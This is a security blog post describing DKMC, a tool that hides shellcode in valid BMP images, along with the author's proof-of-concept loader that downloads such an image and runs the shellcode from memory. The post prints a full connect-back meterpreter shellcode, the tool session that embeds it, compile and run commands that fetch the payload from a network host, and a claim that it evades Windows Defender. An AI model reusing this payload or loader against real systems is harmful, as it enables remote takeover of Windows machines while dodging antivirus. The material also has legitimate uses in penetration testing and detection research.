DKMC is a tool that writes shellcode into valid pictures and was written by Mr.Un1k0d3r (https://twitter.com/MrUn1k0d3r). I wrote a PoC that can be used here (and of course also for other raw shellcode). The PoC is downloading a shellcode file into memory and then execute the shellcode.
Download DKMC: https://github.com/Mr-Un1k0d3r/DKMC
Update: The PoC is now part of DKMC, see DKMC/core/util/downloadshellcodebin.c.
(You can download the source code of the PoC here: https://github.com/govolution/avepoc/blob/master/downloadshellcodebin.c)
Make the picture with the shellcode
After installing and starting DKMC perform the following steps:
Step (1)
Select an option:
[*] (gen) Generate a malicious BMP image
[*] (web) Start a web server and deliver malicious image
[*] (ps) Generate Powershell payload
[*] (sc) Generate shellcode from raw file
[*] (exit) Quit the application
>>> gen
Step (2)
The shellcode is a connect back meterpreter in this case.
(generate)>>> set shellcode \xdd\xc3\xb8\xa3\xb6\x96\x21\xd9\x74\x24\xf4\x5f\x29\xc9\xb1\x85\x31\x47\x18\x03\x47\x18\x83\xef\x5f\x54\x63\xdd\x77\x1b\x8c\x1e\x87\x7c\x04\xfb\xb6\xbc\x72\x8f\xe8\x0c\xf0\xdd\x04\xe6\x54\xf6\x9f\x8a\x70\xf9\x28\x20\xa7\x34\xa9\x19\x9b\x57\x29\x60\xc8\xb7\x10\xab\x1d\xb9\x55\xd6\xec\xeb\x0e\x9c\x43\x1c\x3b\xe8\x5f\x97\x77\xfc\xe7\x44\xcf\xff\xc6\xda\x44\xa6\xc8\xdd\x89\xd2\x40\xc6\xce\xdf\x1b\x7d\x24\xab\x9d\x57\x75\x54\x31\x96\xba\xa7\x4b\xde\x7c\x58\x3e\x16\x7f\xe5\x39\xed\x02\x31\xcf\xf6\xa4\xb2\x77\xd3\x55\x16\xe1\x90\x59\xd3\x65\xfe\x7d\xe2\xaa\x74\x79\x6f\x4d\x5b\x08\x2b\x6a\x7f\x51\xef\x13\x26\x3f\x5e\x2b\x38\xe0\x3f\x89\x32\x0c\x2b\xa0\x18\x58\xc5\xde\xd6\x98\x71\x56\x7e\xf6\xe8\xcc\xe8\x4a\x9c\xca\xef\xad\xb7\x22\x2b\x02\x6b\x16\x98\xf7\xe3\xa2\x48\x8e\x54\x2d\xa1\x23\xc8\xb8\x49\x90\xbd\x54\xf5\x17\x42\xa5\xe1\x2d\x43\xa5\xf1\x7e\x74\xc8\xa5\xce\x2b\x45\x09\x98\xaa\x39\xdf\x77\x40\xfc\x90\x2d\xd9\x41\x6c\xe6\x8c\x10\x3b\x49\x70\xdf\xea\x06\xbb\x9e\x5b\xa1\xa7\x6c\x03\xb4\x64\x23\xbd\x52\x59\xd1\x72\xee\xcf\x56\x17\x64\x9a\xfe\xb2\x4e\x63\xc9\x0b\x9a\xf7\x0c\x47\x88\x9d\x28\x93\x1c\x0d\x98\x95\xca\xbb\xaa\x76\xa5\x48\x5c\xbf\x3d\xc1\xfa\xef\xc9\x45\x98\x66\x6b\x3c\x24\x34\xca\xed\xea\xb4\xa0\x86\x27\x5b\x79\x68\x72\xa8\x1e\xb9\xce\x89\xb0\xd7\x8b\x38\x52\x18\x44\x7a\xa1\x1a\x36\x30\x81\xd6\x80\xf8\x44\xd3\xd8\x92\x09\x43\x73\x2b\x81\x14\x21\xfa\xc4\x80\x8d\x9f\x75\x7b\x3d\x59\x0d\xdb\x27\xd4\x87\xbc\xde\x8e\x65\x77\x6c\x3e\xc7\x28\x25\xb0\xa6\x9b\xc3\x55\x2d\x66\x07\xf0\xe1\x16\x15\x8b\x97\x85\xd9\x23\x0f\x7d\x53\x5c\x09\x7e\xb6\xea\x53\xd2\x51\xed\x69\x35\x25\xbe\xde\xe6\x71\x12\xb6\x60\x95\xc1\x18\x4a\x96\x3f\xf2\xc6\x62\x9f\x92\x96\x40\x1f\x62\x1e\x46\x75\x66\x70\xed\x95\x30\x18\x84\xef\x22\x5e\x99\x25\x09\x0c\x35\x95\xfb\xda\x94\x1f\x1b\x60\x18\xca\x9e\x56\x93\xe1\xc8\xde\x4f\x0a\x08\xb7\x2b\xfa\x3d\xa7\x4b\x2f\x72\x52\x79\x38\xc6\x9c\x81\xb9\xbc\xdc\xe9\xb9\x50\xdd\xe9\xd1\x50\xdd\xa9\x21\x03\xb5\x71\x86\xf0\xa0\x7d\x13\x65\x79\xd1\x15\x6e\x29\xbd\x25\x50\xd6\x3d\x75\xc6\xbe\x2f\xef\x6f\xdc\xaf\xda\xea\xe1\x24\x2a\x7f\xe6\xc5\x77\xfa\x29\xb0\x92\x5c\x69\x64\xb5\x37\x92\x64\xba\xf6\x55\xa9\x6b\xc9\x93\xf5\x5d\x1b\xf2\x34\x92\x68\x0a\x8c\x22\x3b\xa8\xa4\xa8\x43\xfe\xb7\xf8
Step (3)
(generate)>>> run
[+] Image size is 300 x 275
[+] Generating obfuscation key 0x13828655
[+] Shellcode size 0x22c (556) bytes
[+] Generating magic bytes 0x85240292
[+] Final shellcode length is 0x27f (639) bytes
[+] New BMP header set to 0x424de97cc40300
[+] New height is 0x0e010000 (270)
[+] Successfully save the image. (/root/tools/DKMC/output/output-1520014787.bmp)
There is a webserver included, or copy the file to your favorite webserver.
Usage
Compile: wine gcc -s -m32 downloadshellcodebin.c -lwsock32 -lWs2_32
Call with a.exe http://192.168.2.103/output-1520014787.bmp
BTW tested with up to date windows 10 and not recognized by defender.
Of course the PoC can also handle raw output files from MSF.
danielsauder 
Leave a Reply